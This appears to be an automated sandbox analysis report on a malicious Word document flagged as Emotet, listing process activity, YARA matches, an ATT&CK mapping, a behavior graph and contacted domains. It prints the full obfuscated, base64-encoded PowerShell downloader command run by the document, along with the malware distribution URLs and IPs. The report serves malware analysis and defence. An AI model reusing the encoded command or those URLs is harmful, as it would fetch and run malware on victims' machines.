                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid 7_2_10004C5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,7_2_10007D46
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2115320504.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108163281.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2106729405.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2347931935.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2112888635.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2118847844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2111186351.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2109344000.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaPowerShell3Rc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 336489 Sample: pack-91089 416755919.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->59 61 12 other signatures 2->61 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 27 2->17         started        process3 signatures4 75 Suspicious powershell command line found 14->75 77 Very long command line found 14->77 79 Encrypted powershell cmdline option found 14->79 81 PowerShell case anomaly found 14->81 19 powershell.exe 12 9 14->19         started        22 msg.exe 14->22         started        process5 dnsIp6 47 khanhhoahomnay.net 210.86.239.69, 49168, 80 NETNAM-AS-APNetnamCompanyVN Viet Nam 19->47 49 veterinariadrpopui.com 209.59.139.39, 49167, 80 LIQUIDWEBUS United States 19->49 51 3 other IPs or domains 19->51 24 rundll32.exe 19->24         started        process7 process8 26 rundll32.exe 15 24->26         started        signatures9 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->69 29 rundll32.exe 5 26->29         started        process10 signatures11 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->73 32 rundll32.exe 5 29->32         started        process12 signatures13 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->53 35 rundll32.exe 5 32->35         started        process14 signatures15 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->63 38 rundll32.exe 5 35->38         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->65 41 rundll32.exe 5 38->41         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->67 44 rundll32.exe 5 41->44         started        process20 signatures21 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->71

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      pack-91089 416755919.doc37%VirustotalBrowse
                      pack-91089 416755919.doc43%ReversingLabsDocument-Word.Trojan.Heuristic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.2.rundll32.exe.6c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.1d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.270000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.rundll32.exe.1a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://veterinariadrpopui.com0%Avira URL Cloudsafe
                      http://veterinariadrpopui.com/content/5f18Q/100%Avira URL Cloudmalware
                      http://sofsuite.com/wp-includes/2jm3nIk/0%Avira URL Cloudsafe
                      http://khanhhoahomnay.net/wordpress/CGMC/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/0%Avira URL Cloudsafe
                      http://5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/0%Avira URL Cloudsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://shop.elemenslide.com0%Avira URL Cloudsafe
                      http://khanhhoahomnay.net0%Avira URL Cloudsafe
                      http://shop.elemenslide.com/wp-content/n/100%Avira URL Cloudmalware
                      http://sofsuite.com0%Avira URL Cloudsafe
                      http://wpsapk.com0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://wpsapk.com/wp-admin/v/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      veterinariadrpopui.com
                      		209.59.139.39
                      		truetrue
                        		unknown
                        wpsapk.com
                        		104.18.61.59
